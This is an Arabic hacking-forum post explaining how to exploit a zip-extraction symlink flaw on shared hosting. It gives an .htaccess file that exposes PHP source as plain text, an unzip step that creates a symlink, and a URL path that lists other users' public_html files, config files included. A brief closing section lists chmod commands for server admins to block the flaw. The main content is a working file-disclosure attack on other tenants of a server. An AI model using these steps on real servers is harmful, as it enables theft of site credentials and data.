بـسم الله الرحمن الرحـيم ,


[+] يوم شفـت نفـسي فـآضي فـ قلت آشرح طريقة لكم ثغـٍره فـٍُك آلضغ‘ــط , وطـريقـة ترـقيعهآ ×

نبدأ على بركه الله ,


نشـرح الثغره ووظيفتهآ , عشـآن الكـل يفهم وش القصه ,


الثغره هـآإذي تمكنآ من قرائه ملفآت اي موقع على السيرفر SERVER منهآ الكونفج واي ملف أخر على السيرفر

أدوأت الثغره

ملف هيتكس موجود فيه , <
رمز PHP:
<code style="white-space:nowrap"> <code> #&#91;D&#93;eveloped l3y Me dont ask who im ...
Options +FollowSymLinks
DirectoryIndex Index.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
</code> </code>

وملف ZiP عشآن يفك الضغط ويسحب بأسم 1.txt

نشوف الصور مع بعـض ,

انا سويت مـلف بأسم S!Lv3r.47

> الصور تتـكلم ×




1=> الملفآت الي موجوده

2=> المسار الي أحنا عليه





الحينـ نطبق الامر ,

unzip Sec.zip

=> لي فك الضغط عن المـلف

نشــوف وش نتج لنـآ



تشـوفو نشأء لنآ اختصـآر 1.Txt




نروح للملف الي سوينآ فيهـ الاخصـآر

http:/xxxx.com/images/updates/S!Lv3r.47/

رآح نلآحظ ملف أسمه [ 1.txt ]



الحين ندخله ورآح نسوي كذا

http:/xxxx.com/images/updates/S!Lv3r.47/1.txt/home/user/public_html

الون الاحمر > يعني اليوزر الي نبي نشوف ملفآته .!


آنآ حطيت يوزر آحد موآقع السيرفر SERVER

تعـآلو نشوف ظهرت لنآ الملفآت ولالا ؟ .




بـوـوـوـوم ظهرت لنآ .!

هذا شرح طريقة للثغره ولي شده خطورتهـآإ

نبدأ بطريقة الترقيع أتركهآ لي مدرآء السيرفر SERVER

رمز PHP:
<code style="white-space:nowrap"> <code> chmod 711 /bin/gzip
chmod 750 /usr/bin/gzip
chmod 750 /bin/gunzip
chmod 750 /usr/bin/gunzip
chmod 750 /bin/gtar
chmod 711 /usr/bin/unzip
chmod 711 /usr/bin/zip
chmod 700 /usr/bin/unrar
chmod 711 /usr/local/bandmin
</code> </code>


موفـقين ,


Se-Hotmail.Com & r00tSecurity


[-] العضـوية مستعـآره






©المشاركات المنشورة تعبر عن وجهة نظر صاحبها فقط، ولا تُعبّر بأي شكل من الأشكال عن وجهة نظر إدارة المنتدى©